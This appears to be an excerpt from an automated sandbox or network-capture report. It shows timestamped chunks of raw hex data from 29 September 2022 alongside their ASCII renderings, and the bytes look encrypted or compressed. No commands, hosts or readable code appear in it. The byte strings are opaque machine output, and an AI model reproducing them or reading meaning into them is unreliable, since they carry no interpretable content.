                                                                                                        2022-09-29 12:45:00 UTC15INData Raw: 3d 0d 53 dd 1d dc 12 35 25 bc 25 53 c5 74 6f ac 4f 14 b9 e3 67 de da e3 c8 0a e4 83 0e 06 23 ed 40 0c bb fd 86 92 fe b8 df e6 5a 41 34 9c 2d f2 d2 0b ae a2 85 51 dd 6d 90 f6 2c 8f 9a 0f 04 eb cd 23 1f 97 f5 f1 4e 0f 63 45 4e f3 72 a5 0c 3f 7c 9c d7 5c d2 55 cf 97 5b 77 82 4b 04 60 62 28 62 87 1f ff e8 cb 2e 58 06 7a a1 5a 77 37 f0 68 6d 8b c6 41 3b b9 f0 da e9 7b 5e 5b da 76 28 69 bf b4 b9 a3 da 65 56 41 23 70 f8 05 4b b2 f4 42 18 3d 6f 74 a3 02 82 6c 84 bd 42 30 18 aa 6c 50 ff c3 23 a9 ad cd 50 b9 8b a7 b2 40 b3 c7 49 ee 17 0c e5 ef 59 3c 42 e1 28 23 68 f9 47 48 37 be 08 40 c3 7c 2a 87 a4 04 4b 71 9e 79 0b d8 a9 a9 1f 2f 56 d6 46 56 9f 6f aa 8e d0 ce 4b 1a dd 4c e9 6f 10 49 d7 bd ae 53 d5 70 94 f2 06 00 be 74 78 71 8d 4f 0b 5c 29 cb 33 94 14 e7 c7 b3 62
                                                                                                        Data Ascii: =S5%%StoOg#@ZA4-Qm,#NcENr?|\U[wK`b(b.XzZw7hmA;{^[v(ieVA#pKB=otlB0lP#P@IY<B(#hGH7@|*Kqy/VFVoKLoISptxqO\)3b
                                                                                                        2022-09-29 12:45:00 UTC16INData Raw: 9a 4b ac 49 ab e2 1c 36 bb 0b e4 6e a6 23 ec 6c 14 5d 30 68 e1 d2 47 84 02 c0 39 aa dd 08 5e 3e 4b 4b 33 83 fa c1 c1 2c f5 98 d1 49 9e a7 97 91 53 62 32 af fb 6b b9 9a 99 d2 f9 8d 6e d1 9e 67 80 8b ce 7b d9 87 b8 c3 25 f9 99 a3 1a dd 4a da 04 d8 20 03 76 86 48 a1 8c bc cf ad 78 f5 c9 ca 93 a6 8a 77 25 9f 01 e3 40 24 b7 08 8e 30 68 e9 dd 84 fc 30 8a 67 b5 61 3f f6 e1 bf 21 48 0e 5e 0c 33 9d 54 17 d7 b1 25 27 29 32 38 10 3d 9f 6d 35 5d 30 d0 f6 0b 6d 1f 59 11 e5 69 03 ab c9 bb b9 cb 0f 45 0f 84 e6 35 3e 38 9b 49 d5 8f b3 76 81 39 ad 13 14 8d 84 f1 7e 49 c7 e0 34 01 4e 02 96 32 a8 30 26 53 3b d3 83 9f 5e c4 cc 5f 98 3a 3e 1e 22 2b 91 30 82 7a b6 8a 93 d5 3b 41 92 ed 16 0d ff e6 51 d3 dd 0f 3c 8b 14 86 6f 6e 28 41 a1 37 11 1d e0 8b 44 30 93 44 c5 82 3a 99 b7
                                                                                                        Data Ascii: KI6n#l]0hG9^>KK3,ISb2kng{%J vHxw%@$0h0ga?!H^3T%')28=m5]0mYiE5>8Iv9~I4N20&S;^_:>"+0z;AQ<on(A7D0D:
                                                                                                        2022-09-29 12:45:00 UTC18INData Raw: ac 9c 8c 93 a9 2a c3 a4 30 fb 7f 88 81 83 37 66 5a c5 3a a1 59 e9 3d 3e 2d ea 91 8e ad 73 f6 ea 0c 61 50 8a 93 85 f5 57 fe 6d 84 af f0 af 77 f1 45 ec 3d 56 9e c1 72 4b 48 14 8b a4 39 8e 3d c4 ed 55 17 a3 c5 f2 00 3f 1c 21 9d 0c bd f3 4f bc 74 1c 22 7c 16 15 30 95 0a 4c f7 fa 91 9c ed a8 8b 10 b9 d8 ba f1 ba 67 fb 7c 5a b9 16 3f 5e 79 68 0f 3f 66 3e e6 02 37 d7 90 1e 51 3f cf 16 e3 f8 6c 3c 9f 1c ff 46 10 16 ef de 78 cf 1c b7 1a 3e 85 39 84 ea a6 36 ca 78 5c 33 42 a3 9b 60 b4 5f fd 1b 5e 42 1a 60 24 6f 54 41 6b ea a3 ef 63 7f 05 94 85 cc 3a 1d 75 a1 34 16 57 a5 dc d9 46 7b a5 b2 e2 4c db e3 07 19 cd e7 c7 6c 3e dd a2 29 89 de 79 d4 c8 a5 13 42 a4 fe e6 9a d0 d0 0c d1 16 9a 2c 61 45 49 d3 7a a0 0c 4e c5 3f fd 14 6f 37 49 fa bf 8e 6b 79 38 3b 60 aa d2 c3 55
                                                                                                        Data Ascii: *07fZ:Y=>-saPWmwE=VrKH9=U?!Ot"|0Lg|Z?^yh?f>7Q?l<Fx>96x\3B`_^B`$oTAkc:u4WF{Ll>)yB,aEIzN?o7Iky8;`U
                                                                                                        2022-09-29 12:45:00 UTC18INData Raw: 57 09 89 3b 60 2f da 39 06 cc 7c 81 d8 a0 d4 b0 f0 13 a4 5e 5f 3d b2 31 1e f7 44 d5 ca 34 94 53 1d 74 b1 05 98 b5 1f a2 3c 71 c7 63 2d b3 cd 20 54 b3 f5 31 04 10 b3 6a d4 fd 5a e2 b4 8f 99 53 84 17 b9 17 94 68 c1 a0 a5 7a 9e a0 d2 ac ed 0d 0b 53 18 bd e7 3e 04 29 2f 6f ad 81 39 02 e2 fe b7 da 24 92 2f db b5 6c 27 f2 d8 61 76 12 c7 09 b5 8f fb e1 26 4a ad 5a 7d bb 1f ed eb a3 06 0d 31 4f 45 c2 a6 46 b3 b8 82 09 4d 90 43 76 f7 64 7a e0 b0 2f 35 9e 39 bd 9e 38 c8 e4 fc 17 68 62 2b 05 ae 8e d6 55 60 f3 41 26 ab 7c 39 ca 53 eb bb 59 4d 6f 68 f7 66 a5 0b 31 e2 9a 59 f7 d1 b6 3e 4d 9c a2 2c dd 28 ea 68 2c 62 32 80 32 17 3a 2e 9e 71 d5 8f 75 8a 0a 8d 2d 38 0c 4e 11 b6 20 c4 51 56 42 c4 02 ce 48 eb a5 75 01 0a 05 22 ce 17 e0 bc 1c a9 31 85 59 44 4a df 46 b8 a2 04
                                                                                                        Data Ascii: W;`/9|^_=1D4St<qc- T1jZShzS>)/o9$/l'av&JZ}1OEFMCvdz/598hb+U`A&|9SYMohf1Y>M,(h,b22:.qu-8N QVBHu"1YDJF
                                                                                                        2022-09-29 12:45:00 UTC34INData Raw: 3a 2f bf c2 a3 8b 73 33 8d d1 5c bf b8 bf 30 eb 9e 89 a6 0a c9 5c a1 61 a8 37 dc d3 d3 73 29 a7 d8 09 01 2e 5c 25 cc e4 6c 6d a9 16 7e 50 07 f9 e6 d5 a3 68 cd 85 c8 29 dd 7d 46 ea 36 fb 71 fb d5 17 84 4a 13 9e 75 dc 24 22 93 96 d1 a3 41 33 95 3c d4 53 45 bf d2 36 69 79 b1 f8 b2 92 41 e6 80 9c 6f 1b 63 cc 39 07 af bb a5 ac cf 17 53 b8 50 da 6c d0 22 79 ad 16 ad 5d 6b c1 b8 ba c5 ee 0f 1e 12 00 74 8b f3 ac 63 dc 91 d9 56 48 7d 19 79 6b c8 8c 39 ad 3d 9d 75 f9 01 24 ca 39 f5 02 85 1a de 66 e0 31 9a 81 28 c9 6f 83 c2 6e fc 59 b0 8c 46 18 1c 3f bd b8 41 08 14 76 41 18 83 1c 8c c6 50 37 29 01 ec 92 de b4 87 07 6f f3 b8 1b 1d 05 81 b7 5e 21 58 5b 5c fb 6b 36 b5 0d 95 42 fb 6a 1f 6e d0 53 9f ee 1c 20 c5 e7 77 71 e1 90 26 ad aa ed 45 59 c2 34 bc 32 c3 58 22 50 aa
                                                                                                        Data Ascii: :/s3\0\a7s).\%lm~Ph)}F6qJu$"A3<SE6iyAoc9SPl"y]ktcVH}yk9=u$9f1(onYF?AvAP7)o^!X[\k6BjnS wq&EY42X"P
                                                                                                        2022-09-29 12:45:00 UTC50INData Raw: 3f c2 33 9c a4 f5 61 71 9b f0 a3 66 76 29 03 59 ec d7 60 47 f5 f9 d9 76 2e a8 01 fe 24 41 ca 6c 0b 96 45 47 df 38 80 47 2b 0b c9 ee 59 1b 47 8f c9 0a fa 46 e5 c2 31 ca b5 01 a7 27 0f 3a 46 79 d6 9f d9 9a 85 3a 3f 84 08 cf b5 bd 35 c3 13 1a 98 00 d0 8e e1 71 43 9b f7 59 8d f4 57 27 79 27 9b d0 1b 46 f8 a7 8d cc 97 1e ac 36 89 10 3f c4 6a 1f a6 82 8e c2 18 ea 2f 30 df b9 73 03 06 e8 76 74 54 a1 c2 56 58 fb ca 02 70 1b a4 8a 9b fc 4e 81 cb 7f e4 49 55 d7 ca 43 b1 78 63 b5 d0 42 d4 4c 1c 76 aa d5 b7 db 50 7b b7 98 45 7c ee f4 e8 53 6e 2a f9 c3 13 dc 2d d6 aa f8 f0 51 b5 53 73 e5 8e 7c 56 64 69 a9 cf 96 ed 4c bb f8 e5 0e f1 a3 a0 c9 60 31 fb 15 ee d6 80 6f d6 54 20 12 63 df 17 14 5f 7c 46 c9 6e 48 f3 5a 90 38 39 ac 45 52 a9 67 b8 43 a2 78 96 b6 5c bc 63 0e 87
                                                                                                        Data Ascii: ?3aqfv)Y`Gv.$AlEG8G+YGF1':Fy:?5qCYW'y'F6?j/0svtTVXpNIUCxcBLvP{E|Sn*-QSs|VdiL`1oT c_|FnHZ89ERgCx\c
                                                                                                        2022-09-29 12:45:00 UTC66INData Raw: fc a4 ac f1 3c 8d 2d 70 20 41 b3 3a d5 bb 30 04 e0 cc 85 c1 6a ae bf 8a 7b a3 28 e7 ea ed dc c8 24 ee 73 45 42 d9 47 37 27 fb 49 cc fe 97 38 f4 33 fe a5 73 7c e8 9e c2 b5 73 95 30 85 18 39 dc f1 02 08 7d eb 76 75 95 35 c9 53 f0 3a 88 b3 63 f7 52 cc 3a d8 02 39 c6 e3 fb ce 21 c5 53 ff ae 48 48 bf 9e 8b bf 96 63 07 ad 8c 90 fd 6c 4f e6 06 7e 27 75 26 96 81 ec d9 08 30 e9 e1 b7 cd 43 c7 c6 e1 63 c1 01 46 6f 75 8b 82 43 1f b2 6d 6e ad 0f 72 0f f5 84 63 7b 29 1d bb a5 7f 9b 31 bd 78 fa 88 66 5a ca 2f 5f fb 3b 79 0c b3 21 2b d2 4f ef 53 52 79 27 58 ab e6 8d de 84 0b c2 40 19 04 20 83 87 d5 bb 39 56 6b 89 f0 9d 4a 1e 36 f9 8b 4c 09 b2 b4 b1 b7 11 c8 09 8c fb 1c fe 29 91 52 83 d4 61 0b 52 54 02 ff ed 1f 95 1d 2f 99 fb 30 24 45 1d fd 1b 79 f1 41 71 c5 25 7a d0 ed
                                                                                                        Data Ascii: <-p A:0j{($sEBG7'I83s|s09}vu5S:cR:9!SHHclO~'u&0CcFouCmnrc{)1xfZ/_;y!+OSRy'X@ 9VkJ6L)RaRT/0$EyAq%z
                                                                                                        2022-09-29 12:45:00 UTC82INData Raw: dd 86 ef c3 bb 7d 78 d9 5b 4c 9c 7d 61 b2 37 54 46 58 b0 97 76 c9 40 b0 12 3d 20 00 6f 79 8b 0b 1e 88 33 2e e8 bd 78 20 6e 66 3d c7 ce 6d d0 2d c7 cf 8e 65 4c 97 9e 11 4e b5 b1 07 43 87 17 32 55 20 6c 8e fb 51 6e 4d bd 97 15 88 bb 92 ad 04 12 32 c4 97 57 2e 78 38 ad 56 23 9b 65 3f a5 8b 25 1c 6e 7e fb ad 0f e6 85 b3 d1 00 3a ba 84 fa c7 0c 74 8a 15 1c 7b e0 a2 96 03 7f 4d fb cf 2e 22 77 e1 72 42 d6 72 e6 21 71 20 0e 02 7c 90 82 45 dd 92 2b 36 7b 88 e7 ca 2d 70 04 ae 15 2e 68 ee 7a a5 21 d8 a2 68 42 6d aa 6c 70 24 46 ea 46 e9 65 78 91 f8 33 bc 17 b7 9a 0f 55 1e 1e aa be d3 03 cd 9b 2a 70 eb 84 e3 f3 1b 81 d6 55 45 6a 86 31 a4 c6 49 a8 7c 61 89 3c 7e f3 f2 fa aa ed b4 13 07 36 ba 60 2b 1b 4d 59 1a 13 db 55 e9 43 e9 3a eb 68 c3 c5 5a cd 7d 3b 4f 8c 6f 97 bd
                                                                                                        Data Ascii: }x[L}a7TFXv@= oy3.x nf=m-eLNC2U lQnM2W.x8V#e?%n~:t{M."wrBr!q |E+6{-p.hz!hBmlp$FFex3U*pUEj1I|a<~6`+MYUC:hZ};Oo
                                                                                                        2022-09-29 12:45:00 UTC98INData Raw: 39 71 d2 b5 83 5d ce ab 21 74 60 76 2e b4 f7 9f 48 be 4f f9 3e 0e cf 32 69 3e bf 9d 74 9f 80 e4 9e 62 48 6f b9 c1 a3 58 e4 a0 4a 9d df b4 3d 19 c6 94 07 87 9b 52 64 1b 28 ca e6 29 93 3b dc dd 03 bd 6b 79 97 5c cf 13 c3 30 d5 89 b5 c7 e4 3f 30 4e 2c f4 e5 8b 3a b5 b1 f3 be 30 cd aa f7 ee e1 00 83 94 9a 9d dc 27 77 dd b4 8e f6 45 52 d0 30 6e 46 49 f3 65 78 f5 fa c8 30 99 68 0b 11 97 4f 0b cb 2c fd 9a a2 ef 77 0d 2a c7 a4 77 27 07 7d 6d 11 f8 67 35 3f 19 78 c0 ba b9 0c dc c8 81 dc 76 b9 64 c5 e6 11 ec dd 7b 01 4b d7 b4 19 bc 94 26 cc 9f 1e 8b c4 f7 29 4b 33 3b 0b 41 b0 2d 92 b3 15 21 01 16 4b 29 c3 42 1c 37 b6 d6 c5 fe f8 3d d2 57 02 95 94 a5 57 0a d3 2d 2a 7f aa 2a 9a 0d 77 38 1f d9 08 08 13 8f 03 d2 eb f4 23 75 c6 72 2f 31 49 cb 39 e8 4d ff b2 00 73 8c a8
                                                                                                        Data Ascii: 9q]!t`v.HO>2i>tbHoXJ=Rd();ky\0?0N,:0'wER0nFIex0hO,w*w'}mg5?xvd{K&)K3;A-!K)B7=WW-**w8#ur/1I9Ms
                                                                                                        2022-09-29 12:45:00 UTC114INData Raw: 2c 12 33 d7 9a f8 a7 1b 9d 39 64 7a 4f 6e cb 87 6a 91 c3 96 30 d3 87 c4 33 8a 0a 99 7d 7c 85 23 07 d2 ba 25 69 28 02 1f 15 3f a0 4e 0a 33 96 0f d3 3d 71 66 fe bc 48 08 b7 2f a2 85 a2 7b aa 49 ba fb 97 95 f5 9e 17 c7 8d e6 46 58 8e fb 64 7b d2 86 9e 1a 97 4a a9 dc 27 ff d6 d6 ad e3 f6 30 6e b1 73 0c a8 08 00 f5 d0 88 db 5b ba 3a 5d c9 0e 06 bd 71 8d fd 7a 64 b0 3d e4 d8 c3 83 c5 44 ce 1c d8 e0 29 18 bd a2 80 9d ee 59 f6 1b b9 a9 bd 15 19 9a a0 99 8f cf c6 92 c7 fd 18 3e 08 c6 82 89 46 2b 28 20 86 41 7e 0c 58 3f 99 79 4c 3a 6b 95 b2 db f0 55 26 f5 57 a4 41 82 a0 2e eb bf 61 68 7b f7 84 45 91 e1 fb 07 c1 37 28 67 fa bf d4 db 49 24 9b 19 3f ab ab 16 02 a6 6e 98 e6 a5 c6 c4 31 03 4c b0 08 81 57 b8 31 51 5e 38 91 b5 6f aa 09 21 65 48 98 bf ec 04 17 3d 4c 92 50
                                                                                                        Data Ascii: ,39dzOnj03}|#%i(?N3=qfH/{IFXd{J'0ns[:]qzd=D)Y>F+( A~X?yL:kU&WA.ah{E7(gI$?n1LW1Q^8o!eH=LP
                                                                                                        2022-09-29 12:45:00 UTC130INData Raw: 86 6b f1 b4 ec 7f 13 51 71 24 cd fd f7 d0 76 db df 31 89 4b 8a d4 a1 fb 87 ad 45 9e b7 87 35 90 aa 86 5a ec 83 20 fb 16 f3 0c 50 62 14 4b df 7d fb af 1c 6a 8a d1 15 20 49 b0 1b 30 2b e0 c9 23 25 0f bd 0f 2d 90 ee 76 2c 62 92 20 a9 5a c9 d7 4f d0 ac a8 c9 35 c5 c1 ed 6c 8c 7e 7d 9c c3 6a bb 97 25 ac 31 3c e8 55 c2 1a 84 4e ef 14 0e 40 2c c5 bc 70 30 2c db 62 30 56 af 82 2c d3 b6 b6 a2 10 77 a8 1e a2 3f f8 cd 68 cc d3 cd dd d9 36 1f e7 5c 94 ce 30 fc 63 0f bb 7f 04 63 a0 ec ad d4 a2 27 e1 77 40 a5 22 02 41 45 f8 54 9b 5e a6 2f 77 0f b6 06 96 82 a0 45 7b a7 00 2d 93 36 97 fa a8 27 3f b7 61 be 31 ab 0c da c1 9c 95 88 13 7c 85 a7 dc 22 ba 67 19 db a8 75 e9 06 62 da f2 d8 1c ea 52 22 5f 2b b0 5a 67 2c 57 81 be a3 7e 43 3b 90 0c 62 8c 4f 0b ff 45 be ed d2 6d b9
                                                                                                        Data Ascii: kQq$v1KE5Z PbK}j I0+#%-v,b ZO5l~}j%1<UN@,p0,b0V,w?h6\0cc'w@"AET^/wE{-6'?a1|"gubR"_+Zg,W~C;bOEm
                                                                                                        2022-09-29 12:45:00 UTC146INData Raw: 4a de b4 92 1e 09 2f f2 3d ff b7 e5 3b 1c 4e 91 6c 72 e5 41 4b 31 a6 13 6b 68 68 ef cb 3d 9f 07 67 d0 92 af 4b 90 10 1f 7a ba 23 47 36 dc 10 bb 91 1e 41 34 04 05 20 04 e7 d9 36 b8 4e 2c 43 2b 1e 8d a1 82 f3 a8 4c 54 04 9e 8a 53 37 7d 98 68 f1 ef 2b 5c 25 3a c3 40 f9 c3 bf d9 9f 52 13 1f d5 0e 09 a9 3e 7d ae 34 19 2c 9a 12 44 77 9e eb 35 35 90 1a 3e f6 29 67 ca 60 6c 6f 4f 71 3d 65 c9 c1 c9 a6 c7 4e bd cc 25 07 dd 4b 95 f5 00 27 20 f0 4d 2b 74 30 5a b5 81 cf c7 bf 1b c9 73 d9 be 0b a6 58 41 5b 07 17 19 95 09 67 2c 0a 31 11 35 e6 9d 2e 29 c9 df bb 8b 63 f3 f0 a4 79 8e f9 b4 27 e6 5e 8d e5 34 47 73 72 ce 98 dd 87 b7 b8 97 b7 16 6f 21 d8 13 c3 3c 64 02 dd 0b 3f b6 10 1e 74 5d 53 31 c0 ab e3 6e 56 fb 8b 5b e7 6e 15 7f bd 4d f5 ba 78 84 99 59 ce 6b 57 b6 25 ae
                                                                                                        Data Ascii: J/=;NlrAK1khh=gKz#G6A4 6N,C+LTS7}h+\%:@R>}4,Dw55>)g`loOq=eN%K' M+t0ZsXA[g,15.)cy'^4Gsro!<d?t]S1nV[nMxYkW%
                                                                                                        2022-09-29 12:45:00 UTC162INData Raw: 54 52 81 1a e0 2f aa bc 16 78 5f aa d0 3f 4e 15 64 0f 25 55 b5 86 7c c0 05 73 b2 05 c6 44 8a 6e 7c 8d 2b 0d 68 81 d2 06 2a b5 ec cf 34 5e 82 e6 21 ae 71 aa 72 44 14 ce a0 1a c3 ff ea fe 34 09 6d 5a 24 b6 90 30 b4 c0 94 c3 a0 62 b0 79 18 ab df 66 e7 56 84 8d d1 c3 45 e0 2a 1c 71 b6 98 22 19 c3 e3 3b c7 6b dd 12 16 e8 64 c7 5e 51 e8 d0 5c b9 5e 48 35 8e f6 4d 78 a8 83 ce ef 2d dc fc aa 72 e4 6b a6 53 54 8d 6d 0c fa d6 e0 a4 a9 7b 03 b6 d5 64 fd 20 fe 7f 5f 12 48 58 33 20 4a b6 e4 5b 56 60 42 a8 22 89 df 90 f1 62 32 10 3c 9b 05 9c fd 24 4b 6f c1 07 a4 97 70 cb 66 ab fc c5 c0 9c 31 de 06 72 d4 07 63 78 9f 8d 82 99 32 9f ef 6f 38 7d f9 98 d7 06 1e a6 8a 21 bb 99 01 44 69 f2 e3 d9 6f 4f b7 b1 d7 65 7a bb 5a 3c 4b c8 16 19 7c 39 cd fe 4f 31 2e 65 88 50 bc f1 c1
                                                                                                        Data Ascii: TR/x_?Nd%U|sDn|+h*4^!qrD4mZ$0byfVE*q";kd^Q\^H5Mx-rkSTm{d _HX3 J[V`B"b2<$Kopf1rcx2o8}!DioOezZ<K|9O1.eP
                                                                                                        2022-09-29 12:45:00 UTC178INData Raw: 51 be ab f7 43 31 2d a6 9b 5a c2 b2 e8 76 85 a6 05 3a d3 55 bf b8 45 b0 04 44 f5 57 31 6b 06 53 79 18 14 05 a5 2d 80 07 d7 8a c6 d7 54 6a 55 a4 2c a8 64 9e 3f 5d e1 f5 5d 6d 3f 76 f1 c5 06 2b b8 b0 b9 94 ac a5 01 bd 0c 4b 4a 7e 16 7e 14 cb 13 e2 86 3b 89 5b 86 41 e9 3e 7a a0 90 63 76 28 a2 92 61 44 6a 0c 18 83 7a 56 1c ca 89 94 65 92 58 0c 9a 39 72 5a 85 77 37 50 d3 71 99 a5 0e dd d5 c1 1d 7e 56 ad d0 2c 8f 42 d3 5a 52 a5 e6 6c 94 74 63 01 04 11 e6 be 95 29 a5 f2 85 e1 b9 2b 73 f2 96 53 35 89 90 20 af f3 f0 76 4c e9 ce 21 3b a3 b8 ed 32 55 33 0b df e0 fd 5a db 73 bd 61 49 dd 14 6e 28 19 da 3d b9 90 b3 83 c2 c3 2b e9 7e 1c c2 6e dc 84 12 b1 f8 0b d9 33 76 c9 24 c4 67 b1 9f cd f1 5d 31 d3 96 2b 9c f4 0f 14 36 e3 3e f5 1b 61 5a 19 03 61 7d c4 15 7a 66 94 e6
                                                                                                        Data Ascii: QC1-Zv:UEDW1kSy-TjU,d?]]m?v+KJ~~;[A>zcv(aDjzVeX9rZw7Pq~V,BZRltc)+sS5 vL!;2U3ZsaIn(=+~n3v$g]1+6>aZa}zf
                                                                                                        2022-09-29 12:45:00 UTC194INData Raw: 4a 41 0b 3c 2d 04 77 7f 12 6f 92 99 86 2f c7 56 ea 81 cb be 00 b3 a6 14 88 fe 45 80 e0 52 3e 0b 73 d6 61 09 38 d0 ec 6e 00 a3 2c 8c 65 eb 8e f0 5d d2 e6 8b 1d 28 3f 19 2b 09 2d 53 51 a2 af f5 95 15 8a ba a6 e2 16 5e 2d ef fd df cc 90 12 b3 22 49 16 31 83 b1 74 71 f8 5d f4 e2 db 0e e8 63 29 57 22 be b8 65 bc 7f 01 d9 d4 45 00 8b 9c 06 8c 09 a6 1a a5 85 f4 52 d4 50 01 e7 37 53 df 8e ad f2 09 e2 16 f4 34 69 ab e0 ce ea eb 0d 0e 10 76 13 8e fd 2a 6e 0f 16 34 6f 19 61 cd 9c fd ee f7 b0 02 13 4f 66 26 65 c0 f3 76 72 e9 b7 ae 59 db a7 d1 bd ef 1a 70 58 49 50 34 0f 24 ad 99 43 3a 76 d2 87 96 95 2d 3a f5 ff cf 3a da af 7d f0 7b eb 7e 03 f5 fd d0 9d 13 09 bb 39 1d 41 ae ed c7 e4 92 38 9a f3 2c 43 35 8d cd 88 d1 bf c8 0a c8 e7 d1 9e 7b 78 ef b3 af 8d 38 3a 2c f6 9a
                                                                                                        Data Ascii: JA<-wo/VER>sa8n,e](?+-SQ^-"I1tq]c)W"eERP7S4iv*n4oaOf&evrYpXIP4$C:v-::}{~9A8,C5{x8:,
                                                                                                        2022-09-29 12:45:00 UTC210INData Raw: c4 36 0f e3 ee be 1b a4 2b 62 2b 98 f6 95 f1 29 b3 7c 46 85 15 40 64 9c 68 16 6c bd dc 67 b5 36 f3 05 ad 41 35 8a 32 d3 e3 d5 e1 ad ca 4e 24 ff 32 ea 55 fb 3a de 31 a3 22 e9 14 47 c0 7a 60 79 10 49 52 8d 86 3d 8f b5 9d cb 63 e8 02 f2 cf df 81 2d d5 b4 a6 48 24 6a ba cb f4 29 cb 89 1c f7 31 45 ed b6 42 30 84 5b 9c 1c d4 0b e0 c6 2f cd 26 79 93 b4 46 9b 8f a9 96 f4 36 60 9c 92 f2 66 cb 64 bf 38 6e 81 a2 2c e6 46 f6 ea 95 a5 32 d7 43 8d 67 ce 3c c9 81 ab f7 41 8c a7 d4 c2 73 91 88 d7 37 a0 fb 27 43 ef 1d b0 c1 0c cf ec 66 a3 75 28 c3 a4 c3 5e 8b 0e 5e ba d4 b4 95 82 d3 a5 14 48 34 f1 c0 4b ef b4 89 e9 41 b4 7e c5 79 76 a4 38 de 8e c2 b0 49 07 11 0c ae f9 4d fd ad 6a 97 5d fa 2b bb ba c0 44 3f 0f 33 52 67 06 a4 6f 02 15 d2 14 0b f7 6f d1 8b 9e 79 cb b5 e8 c9
                                                                                                        Data Ascii: 6+b+)|F@dhlg6A52N$2U:1"Gz`yIR=c-H$j)1EB0[/&yF6`fd8n,F2Cg<As7'Cfu(^^H4KA~yv8IMj]+D?3Rgooy
                                                                                                        2022-09-29 12:45:00 UTC226INData Raw: 2e f0 c0 f6 23 60 dd 4e 60 3e 56 fa 4f 2b 1a ee 56 54 7c fc 44 f8 5f 4c c6 a2 54 62 03 43 e7 b3 93 ae 4d ee 45 3f 5e 5c 69 43 51 f1 aa e4 51 3c 24 03 d0 8d 61 11 a3 98 51 89 30 a2 88 72 40 83 73 e1 6e a2 64 0e e0 59 c4 51 26 07 77 7e e4 12 b7 3d a6 b0 f5 db ae 8b 4a a4 f4 8a 54 f7 21 c1 c6 50 52 4b 74 72 b2 9c 53 ec 46 55 43 09 35 2f 23 0b c2 5b 8f d3 03 82 79 a9 4e 42 b1 78 a5 a7 bb 9e a5 8d d1 8f 97 a8 7d 25 cf ac a6 e2 b7 40 41 7b 95 95 50 89 21 b5 ef ba f2 d7 29 66 d1 f9 37 34 77 1c 74 2a dd c3 ee b8 71 89 fc 19 cf 7f 97 de be f7 41 24 80 12 22 49 88 4c 21 e0 cc 90 c0 46 4e ba 2b de a4 a0 04 b8 44 12 8b 2d c1 59 a0 93 98 0e 95 c3 ea 55 6d e8 cf af 26 0d f7 9b b6 fa 27 af bd 50 ba d2 42 9f 2c 2d 93 74 9b 00 1b cb d1 fd 3d 63 26 a7 15 f0 ea f4 92 bd c7
                                                                                                        Data Ascii: .#`N`>VO+VT|D_LTbCME?^\iCQQ<$aQ0r@sndYQ&w~=JT!PRKtrSFUC5/#[yNBx}%@A{P!)f74wt*qA$"IL!FN+D-YUm&'PB,-t=c&
                                                                                                        2022-09-29 12:45:00 UTC242INData Raw: 5e d6 4a 80 27 ab 96 ed 6e 43 34 3c 9e 0e e2 95 d5 dd c7 92 cf 80 ef 1d 4e 93 48 3d 5b ba cb dc 3f 2f bc b4 5d 1b c5 ea 6c af 2c 19 b1 62 8f 86 c4 fb b1 ee e1 bf 97 31 bd bf 69 ee b8 20 59 4b b1 c3 cb b8 a9 dd b0 aa a5 3b d3 3f 08 9f df b4 5f c3 9a 64 d1 2c 33 00 1c 1f 67 05 e2 81 f9 99 61 ed b6 40 5d 70 a7 d9 5b ca 90 76 ae a4 28 3f 98 d9 fb d8 b0 7c eb d7 24 96 3d 28 da a1 61 1f 41 e3 43 1e 13 1c 61 d4 10 c5 41 c2 26 77 6c 7c 46 cf 6f ea e1 16 27 f2 ae 2d 64 35 97 7a ae b1 32 cc 92 3c a8 2d 85 85 06 36 d5 99 ab 7c 5d 93 bf 08 85 5c d1 c4 7f e0 37 97 ee 30 72 a5 84 1a df 21 b0 66 cf c2 34 1f 49 f7 74 f5 04 da 02 a4 3b 1b 14 6a ee a5 6a 92 c9 b4 50 9a e4 50 7f 1a 72 f4 f0 60 31 37 a1 0c cc d6 ab dd 67 26 dd 26 1c 54 56 ac 08 37 6e 02 5f 67 8c 2c df 49 04
                                                                                                        Data Ascii: ^J'nC4<NH=[?/]l,b1i YK;?_d,3ga@]p[v(?|$=(aACaA&wl|Fo'-d5z2<-6|]\70r!f4It;jjPPr`17g&&TV7n_g,I
                                                                                                        2022-09-29 12:45:00 UTC258INData Raw: aa f0 0d ca 49 da f9 99 4b 56 bb a7 b3 10 15 41 01 d2 af 6d c6 da 67 4f f6 cc 93 f3 33 ee e8 6b c6 7e 8e 72 5c 00 a4 2a 1e d7 23 37 f5 af 85 a5 3e 97 e2 0d cc a7 74 2a 59 33 9b 74 cd 72 f5 e1 56 f4 73 66 67 e3 1f 61 b3 b8 6f 14 3b 6b f7 b4 05 43 ed 0d 23 20 65 d0 69 84 0d 59 6d c6 47 aa cc 8e 4e 70 c0 66 9a 4b 13 34 34 d3 83 f0 b8 7c 2e bf 8e 94 77 3e 25 78 9f 00 67 f3 0a b2 07 3d cf 25 26 47 7a 81 83 a1 50 73 f3 47 44 33 19 fc 0c 56 c3 54 7f aa 5b 3c dc 87 0b 0a a9 38 02 1c f0 e1 08 11 6d b3 1e 2c 71 54 a9 f4 a6 51 df f3 19 fa e1 aa 18 93 32 72 c8 e4 0c 32 bb f4 b4 8a 33 44 e7 dc 1d cd 87 20 b9 8d 1b 8c cf 7f ee 6e ea 7e ff 25 76 c7 77 74 f6 fd 94 55 39 24 e1 fc 6c d9 6a ed 81 a3 19 5f 39 77 24 da ec f7 30 bb 92 e7 6b 45 36 ab c5 af fa 67 04 10 b7 51 1d
                                                                                                        Data Ascii: IKVAmgO3k~r\*#7>t*Y3trVsfgao;kC# eiYmGNpfK44|.w>%xg=%&GzPsGD3VT[<8m,qTQ2r23D n~%vwtU9$lj_9w$0kE6gQ
